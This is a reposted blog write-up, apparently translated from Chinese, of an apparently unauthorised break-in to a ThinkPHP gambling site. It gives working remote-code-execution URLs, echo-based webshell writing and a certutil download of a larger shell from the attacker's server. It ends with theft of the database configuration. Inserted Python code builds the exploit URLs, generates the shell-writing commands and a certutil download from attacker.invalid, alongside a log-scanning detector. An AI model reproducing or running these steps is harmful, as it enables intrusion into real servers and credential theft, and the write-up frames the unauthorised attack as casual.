
Title: A penetration test of a certain gambling ("spinach") website


I stumbled across a ThinkPHP gambling ("spinach") site. Wasn't there a ThinkPHP (TP) vulnerability recently?

So I gave it a casual test. The process was not smooth, but I got in eventually, so I am writing this up to share my thinking.

0x00 One-click getshell

A quick look suggested plenty of people are already playing on it.

I had written a test tool a few days earlier, so I tried that first.

The tool reports that the site is vulnerable.

One-click getshell; it looks very smooth, haha.

But then Xiao Ming tossed his hair and realised things were not so simple.

When connecting with China Chopper (菜刀, the "kitchen knife"), the server returns a 500 error.

I verified the shell with Firefox's HackBar and it works fine, so why can't Chopper connect?

I couldn't help sinking into deep thought.


0x01 Start analysis

Since I wrote the tool myself, I could see from the getshell screenshot above that it was the third exploit that fired, so let's analyse that one.

The PoC is as follows:

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

Swap whoami into the PoC to check what privileges we have:

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

We are running with IIS-level permissions.

Still, some commands can be executed, such as echo and dir.
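Two things a practitioner wants alongside the PoC above: a way to send it with every parameter correctly percent-encoded (the backslashes in \think\app and the brackets in vars[1][] are exactly the characters that get mangled by proxies and by hand-editing in HackBar), and the matching detection for the server side. The block below is an added example, not code from the original post or the author's tool; the route and parameter names are those of the PoC, while the hostnames, IP addresses and the IIS W3C log excerpt are constructed for illustration.

```python
import re
from urllib.parse import quote, unquote_plus, urlencode

# Added example, not code from the original post. The route and parameter names are
# those of the PoC above (ThinkPHP 5.x think\app::invokefunction); the hostnames,
# IPs and log lines below are constructed for illustration.

def build_invokefunction_url(base_url: str, command: str) -> str:
    """Build the PoC request with every parameter percent-encoded, so the
    backslashes in \\think\\app, the [] in vars[1][] and spaces in the command
    survive proxies, HackBar and the IIS request parser unchanged."""
    params = [
        ("s", "index/\\think\\app/invokefunction"),
        ("function", "call_user_func_array"),
        ("vars[0]", "system"),
        ("vars[1][]", command),
    ]
    # safe="/" keeps the route separators readable; everything else is encoded
    return base_url.rstrip("/") + "/?" + urlencode(params, safe="/", quote_via=quote)


# Detection side: what the same request looks like in the server's logs.
_ROUTE = re.compile(r"[\\/]think[\\/]app[\\/]invokefunction", re.I)
_FUNC = re.compile(r"function=call_user_func_array", re.I)
_SINK = re.compile(r"vars\[0\]=(\w+)", re.I)
_CMD = re.compile(r"vars\[1\]\[\]=([^&]*)", re.I)

def classify_request(query: str):
    """Return None for a benign cs-uri-query, or a dict describing the exploit."""
    # Decode twice: the route is often sent double-encoded (%255C) to dodge naive filters.
    q = unquote_plus(unquote_plus(query))
    if not (_ROUTE.search(q) and _FUNC.search(q)):
        return None
    sink = _SINK.search(q)
    cmd = _CMD.search(q)
    return {"sink": sink.group(1).lower() if sink else None,
            "command": cmd.group(1) if cmd else None}

# Constructed IIS W3C log excerpt (not a real log): one exploit hit, one normal
# request, and one exploit hit sent with raw backslashes and '+' for spaces.
SAMPLE_IIS_LOG = "\n".join([
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status",
    "2024-01-05 09:33:24 10.0.0.5 GET /index.php "
    "s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array"
    "&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami 80 203.0.113.7 Mozilla/5.0 200",
    "2024-01-05 09:33:25 10.0.0.5 GET /index.php s=index/user/login&page=2 80 198.51.100.9 Mozilla/5.0 200",
    "2024-01-05 09:33:40 10.0.0.5 GET /index.php "
    "s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system"
    "&vars[1][]=certutil+-urlcache+-split+-f+http://attacker.invalid/m.php+c:\\www\\public\\m.php"
    " 80 203.0.113.7 Mozilla/5.0 500",
])

def scan_iis_log(log_text: str):
    """Return (c-ip, sink, command, sc-status) for every exploit request in a W3C log."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # IIS writes the column layout in the header
            continue
        if not line or line.startswith("#"):
            continue
        cols = line.split(" ")             # IIS replaces spaces inside fields with '+'
        if len(cols) != len(fields):
            continue
        rec = dict(zip(fields, cols))
        verdict = classify_request(rec.get("cs-uri-query", ""))
        if verdict:
            hits.append((rec["c-ip"], verdict["sink"], verdict["command"], rec["sc-status"]))
    return hits

if __name__ == "__main__":
    print(build_invokefunction_url("http://target.invalid", "whoami"))
    for hit in scan_iis_log(SAMPLE_IIS_LOG):
        print(hit)
```

Note that the scanner matches on the decoded route plus the call_user_func_array parameter, not on a single string, so the hit with raw backslashes and the one with %5C both surface, and the captured command (whoami, then the certutil download) tells the responder what was actually run; a 500 status on an exploit request, as the author saw with Chopper, is not evidence that it failed.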


0x02 Try to break through the shell

Since echo works, we can try writing a small shell (小马, the "pony"). If that succeeds, we use it to upload a big shell (大马) and take it from there. No sooner said than done; the hard part is that it has to be written line by line.

Note: cmd metacharacters in the code have to be escaped with ^. For example, <?php becomes ^<?php.

After writing it line by line, I found it would not run when accessed. I forgot to take a screenshot here.

Next I tried to download the file to the server with another method, which also failed.

Just as I was about to give up, I remembered one more download command that I had not used yet.

That is certutil.exe.

So: host the big shell (大马) on our own server with HFS (HTTP File Server).

Then run the certutil download command.

The big shell was written successfully, but don't celebrate too early.
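The line-by-line echo approach has more pitfalls than the one ^ rule in the note above: ^ cannot escape %, a double quote turns ^ escaping off for the rest of the line, a line that ends in a digit followed by > is parsed as a stream redirect, and echo with a trailing space before > writes that space into the file. The generator below, an added example that is not the author's code, escapes what cmd.exe can escape, refuses lines it cannot write safely, places the redirect before echo to avoid the digit and trailing-space problems, and builds the certutil.exe fallback the post ends up using. The sample PHP, paths and URL are placeholders; each generated cmd line is what goes into vars[1][] of the PoC from 0x01 (URL-encoded, since the & characters would otherwise split the query string).

```python
# Added example, not code from the original post: generate the cmd.exe "echo" lines
# that write a PHP file one line at a time through the command-execution bug, and the
# certutil.exe download that the post falls back to. Paths and URLs are placeholders.

CMD_META = set("<>&|^()")    # characters cmd.exe interprets unless prefixed with ^

def cmd_escape(line: str) -> str:
    """Prefix every cmd.exe metacharacter with ^ so echo prints the line literally."""
    for bad, why in (("%", "cmd expands %name% pairs before echo runs and ^ does not stop it"),
                     ("!", "same for !var! when delayed expansion is on"),
                     ('"', "a double quote switches off ^ escaping for the rest of the line")):
        if bad in line:
            raise ValueError(f"rewrite the PHP to avoid {bad!r}: {why}")
    return "".join("^" + c if c in CMD_META else c for c in line)

def echo_writer_commands(php_source: str, target_path: str) -> list:
    """One cmd line per source line. The redirect goes *before* echo so that a line
    ending in a digit is not parsed as a stream redirect ('echo $x = 1>file' would
    redirect stdout instead of printing the 1) and no trailing space is written."""
    cmds = []
    for i, line in enumerate(php_source.splitlines()):
        redirect = ">" if i == 0 else ">>"   # truncate on the first line, append afterwards
        body = "echo." if line == "" else "echo " + cmd_escape(line)   # 'echo.' prints an empty line
        cmds.append(f"{redirect}{target_path} {body}")
    return cmds

def certutil_download_command(url: str, dest: str) -> str:
    """The certutil.exe fallback used in the post: fetch a file over HTTP(S).
    Defender's note: certutil keeps a copy under the user's CryptnetUrlCache folder."""
    return f"certutil.exe -urlcache -split -f {url} {dest}"

# Constructed sample: a minimal upload stub (the "pony" used to fetch the big shell).
SAMPLE_PHP = """<?php
if (isset($_FILES['f']) && $_FILES['f']['size'] > 0) {
    move_uploaded_file($_FILES['f']['tmp_name'], 'up.php');
}
"""

if __name__ == "__main__":
    for cmd in echo_writer_commands(SAMPLE_PHP, r"c:\www\public\p.php"):
        print(cmd)     # each line is then sent through the invokefunction PoC
    print(certutil_download_command("http://attacker.invalid/big.php", r"c:\www\public\big.php"))
```

The refusal on % and " is deliberate: those are the two characters that silently corrupt the written file rather than failing loudly, which is consistent with (though not proof of) a line-by-line shell that "would not run" on access.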

Xiao Ming tossed his hair again and found things were even harder.

The big shell can upload files, rename them and so on, but it cannot edit files or view their source: clicking just shows a blank page.

In that case, let's get into the database and take a look.

As everyone knows, ThinkPHP keeps its database configuration at the following location:

/application/database.php

The big shell cannot open it, so we go back to the ThinkPHP command-execution vulnerability and try to read the file with type:

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=type c:\www\application\database.php

Reading with type failed, and then the copy command came to mind.

Copy database.php into the web root and rename it 1.txt:

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=copy c:\www\application\database.php c:\www\public\1.txt

After the copy, visiting url/1.txt returns an empty file.

0x03 Successful breakthrough

After this series of failures I calmed down and thought it over: we can also try reading the source code with file_path.

Upload this file to the web root with the big shell, then open it, and the database configuration is obtained successfully.

Then plug the configuration into a client and connect to the database.

It was already late at night when I wrote this. I looked at the half-eaten instant noodles on the table, finished off two sips of the soup, turned off my phone and went to bed.

Reprinted from the original post: https://www.jianshu.com/p/1f9b02780f1c
